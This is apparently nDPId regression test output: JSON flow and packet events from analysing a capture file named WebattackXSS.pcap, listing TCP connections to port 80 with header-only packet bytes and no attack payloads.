+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7711,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":3,"flow_last_seen":1499347895397,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347895397,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+PVAAD4GzOKsEAABwKgKMoQeAFBBmIkTnyPA8YAQAOWVWgAAAQEICgE8ceYD5kNa"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347761418,"flow_last_seen":1499347766830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60652,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347761418,"flow_last_seen":1499347766830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60652,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347762675,"flow_last_seen":1499347767831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60666,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347762675,"flow_last_seen":1499347767831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60666,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347765229,"flow_last_seen":1499347770831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60692,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347765229,"flow_last_seen":1499347770831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347766506,"flow_last_seen":1499347771832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60706,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347766506,"flow_last_seen":1499347771832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347767793,"flow_last_seen":1499347772833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60720,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347767793,"flow_last_seen":1499347772833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60720,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347769077,"flow_last_seen":1499347774833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60734,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347769077,"flow_last_seen":1499347774833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60734,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347770345,"flow_last_seen":1499347775834,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60748,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347770345,"flow_last_seen":1499347775834,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60748,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7722,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347896716,"flow_last_seen":1499347896716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347896716,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7722,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1499347896716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347896716,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SsxAAD4GewSsEAABwKgKMoQsAFDW1Dn8AAAAAKACchBVSgAAAgQFtAQCCAoBPHMwAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":2,"flow_last_seen":1499347896716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347896716,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhCxEXQKe1tQ5\/aAScSDGowAAAgQFtAQCCAoD5kSkATxzMAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7724,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":3,"flow_last_seen":1499347896717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347896717,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ss1AAD4GewusEAABwKgKMoQsAFDW1Dn9RF0Cn4AQAOVlqwAAAQEICgE8czAD5kSk"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347899275,"flow_last_seen":1499347899275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347899275,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":1,"flow_last_seen":1499347899275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347899275,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zuFAAD4G9u6sEAABwKgKMoRGAFBlPbtRAAAAAKACchBC8gAAAgQFtAQCCAoBPHWwAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":2,"flow_last_seen":1499347899275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347899275,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhEbZtc2dZT27UqAScSBRcwAAAgQFtAQCCAoD5kckATx1sAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7742,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":3,"flow_last_seen":1499347899276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347899276,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zuJAAD4G9vWsEAABwKgKMoRGAFBlPbtS2bXNnoAQAOXwegAAAQEICgE8dbAD5kck"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347900544,"flow_last_seen":1499347900544,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347900544,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":1,"flow_last_seen":1499347900544,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347900544,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8T6pAAD4GdiasEAABwKgKMoRUAFAKnjlHAAAAAKACchAeUQAAAgQFtAQCCAoBPHbtAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7753,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":2,"flow_last_seen":1499347900544,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347900544,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhFRwu76qCp45SKAScSCjggAAAgQFtAQCCAoD5khhATx27QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7754,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":3,"flow_last_seen":1499347900544,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347900544,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0T6tAAD4Gdi2sEAABwKgKMoRUAFAKnjlIcLu+q4AQAOVCigAAAQEICgE8du0D5khh"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7773,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347903125,"flow_last_seen":1499347903125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347903125,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33902,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7773,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":1,"flow_last_seen":1499347903125,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347903125,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Iy1AAD4GoqOsEAABwKgKMoRuAFDn\/lpfAAAAAKACchAdOQAAAgQFtAQCCAoBPHlyAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7774,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":2,"flow_last_seen":1499347903125,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347903125,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhG41OTml5\/5aYKAScSBgbQAAAgQFtAQCCAoD5krmATx5cgEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7775,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":3,"flow_last_seen":1499347903125,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347903125,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Iy5AAD4GoqqsEAABwKgKMoRuAFDn\/lpgNTk5poAQAOX\/dAAAAQEICgE8eXID5krm"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347904387,"flow_last_seen":1499347904387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347904387,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":1,"flow_last_seen":1499347904387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347904387,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wAJAAD4GBc6sEAABwKgKMoR8AFDhZ7qvAAAAAKACchDCNgAAAgQFtAQCCAoBPHqtAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7783,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":2,"flow_last_seen":1499347904387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347904387,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhHxZjS4N4We6sKAScSDrcgAAAgQFtAQCCAoD5kwiATx6rQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":3,"flow_last_seen":1499347904387,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347904387,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wANAAD4GBdWsEAABwKgKMoR8AFDhZ7qwWY0uDoAQAOWKeQAAAQEICgE8eq4D5kwi"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7794,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347905694,"flow_last_seen":1499347905694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905694,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7794,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":1,"flow_last_seen":1499347905694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347905694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dZJAAD4GUD6sEAABwKgKMoSKAFAcIA5mAAAAAKACchAycwAAAgQFtAQCCAoBPHv0AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7795,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":2,"flow_last_seen":1499347905694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347905694,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhIr8f9XqHCAOZ6AScSAPmAAAAgQFtAQCCAoD5k1pATx79AEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7796,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":3,"flow_last_seen":1499347905695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347905695,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dZNAAD4GUEWsEAABwKgKMoSKAFAcIA5n\/H\/V64AQAOWunwAAAQEICgE8e\/QD5k1p"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347771635,"flow_last_seen":1499347776834,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347771635,"flow_last_seen":1499347776834,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347774205,"flow_last_seen":1499347779835,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60788,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347774205,"flow_last_seen":1499347779835,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60788,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347775487,"flow_last_seen":1499347780836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60802,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347775487,"flow_last_seen":1499347780836,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60802,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347776753,"flow_last_seen":1499347781835,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347905875,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
